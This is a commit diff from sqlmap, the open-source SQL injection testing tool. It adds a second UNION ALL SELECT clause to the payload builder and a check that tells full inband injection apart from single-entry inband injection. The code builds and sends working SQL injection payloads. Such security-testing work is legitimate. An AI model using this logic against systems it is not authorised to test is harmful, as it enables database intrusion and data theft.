More bug fixes to properly distinguish between full inband and single-entry inband sql injections

2025-02-03 05:04:11 +03:00 · 2010-12-22 15:47:52 +00:00 · 2010-12-22 15:47:52 +00:00 · c1f2534e9a
commit c1f2534e9a
parent b3da473840
2 changed files with 35 additions and 1 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -483,7 +483,7 @@ class Agent:

        return concatenatedQuery

-    def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None):
+    def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None, multipleUnions=None):
        """
        Take in input an query (pseudo query) string and return its
        processed UNION ALL SELECT query.
@ -569,6 +569,22 @@ class Agent:
        if intoRegExp:
            inbandQuery += intoRegExp

+        if multipleUnions:
+            inbandQuery += " UNION ALL SELECT "
+
+            for element in range(count):
+                if element > 0:
+                    inbandQuery += ", "
+
+                if element == exprPosition:
+                    inbandQuery += multipleUnions
+                else:
+                    inbandQuery += nullChar
+
+            if kb.dbms == DBMS.ORACLE:
+                inbandQuery += " FROM DUAL"
+
+
        inbandQuery = self.suffixQuery(inbandQuery, comment)

        return inbandQuery
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@ -8,6 +8,8 @@ See the file 'doc/COPYING' for copying permission
 """

 from lib.core.agent import agent
+from lib.core.common import getUnicode
+from lib.core.common import parseUnionPage
 from lib.core.common import randomStr
 from lib.core.data import conf
 from lib.core.data import kb
@ -46,6 +48,22 @@ def __unionPosition(negative=False, count=None, comment=None):
            setUnion(position=exprPosition)
            validPayload = payload

+            if not negative:
+                # Prepare expression with delimiters
+                randQuery2 = randomStr()
+                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
+                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
+
+                # Confirm that it is a full inband SQL injection
+                query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment, multipleUnions=randQueryUnescaped2)
+                payload = agent.payload(newValue=query, negative=negative)
+
+                # Perform the request
+                resultPage, _ = Request.queryPage(payload, content=True)
+
+                if resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):
+                    setUnion(negative=True)
+
            break

    return validPayload